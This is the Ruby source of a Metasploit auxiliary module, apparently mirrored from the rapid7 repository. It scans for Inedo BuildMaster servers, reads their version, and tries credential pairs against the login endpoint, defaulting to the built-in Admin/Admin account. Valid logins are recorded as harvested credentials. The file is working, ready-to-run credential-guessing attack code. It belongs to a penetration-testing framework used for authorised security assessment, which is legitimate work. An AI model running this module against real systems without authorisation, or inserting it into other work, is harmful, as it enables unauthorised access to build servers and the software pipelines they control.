Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/buildmaster_login.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::AuthBrute

9
  include Msf::Auxiliary::Report

10
  include Msf::Auxiliary::Scanner

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Inedo BuildMaster Login Scanner',

17
        'Description' => %q{

18
          This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'

19
          which has the default password 'Admin'.

20
        },

21
        'Author' => [ 'James Otten <jamesotten1[at]gmail.com>' ],

22
        'License' => MSF_LICENSE,

23
        'DefaultOptions' => { 'VERBOSE' => true },

24
        'Notes' => {

25
          'Reliability' => UNKNOWN_RELIABILITY,

26
          'Stability' => UNKNOWN_STABILITY,

27
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

28
        }

29
      )

30
    )

31


32
    register_options(

33
      [

34
        Opt::RPORT(81),

35
        OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']),

36
        OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin'])

37
      ]

38
    )

39
  end

40


41
  def run_host(ip)

42
    return unless buildmaster?

43


44
    each_user_pass do |user, pass|

45
      do_login(user, pass)

46
    end

47
  end

48


49
  def buildmaster?

50
    begin

51
      res = send_request_cgi('uri' => '/log-in')

52
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE

53
      print_error("#{peer} - HTTP Connection Failed")

54
      return false

55
    end

56


57
    if res && res.code == 200 && res.body.include?('BuildMaster_Version')

58
      version = res.body.scan(%r{<span id="BuildMaster_Version">(.*)</span>}).flatten.first

59
      print_good("#{peer} - Identified BuildMaster #{version}")

60
      return true

61
    else

62
      print_error("#{peer} - Application does not appear to be BuildMaster")

63
      return false

64
    end

65
  end

66


67
  def login_succeeded?(res)

68
    if res && res.code == 200

69
      body = JSON.parse(res.body)

70
      return body.key?('succeeded') && body['succeeded']

71
    end

72
    false

73
  rescue

74
    false

75
  end

76


77
  def do_login(user, pass)

78
    print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")

79
    begin

80
      res = send_request_cgi(

81
        {

82
          'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn',

83
          'method' => 'POST',

84
          'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },

85
          'vars_post' =>

86
            {

87
              'userName' => user,

88
              'password' => pass

89
            }

90
        }

91
      )

92
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE

93
      vprint_error("#{peer} - HTTP Connection Failed...")

94
      return :abort

95
    end

96


97
    if login_succeeded?(res)

98
      print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")

99
      store_valid_credential(user: user, private: pass)

100
    else

101
      print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")

102
    end

103
  end

104
end

105


106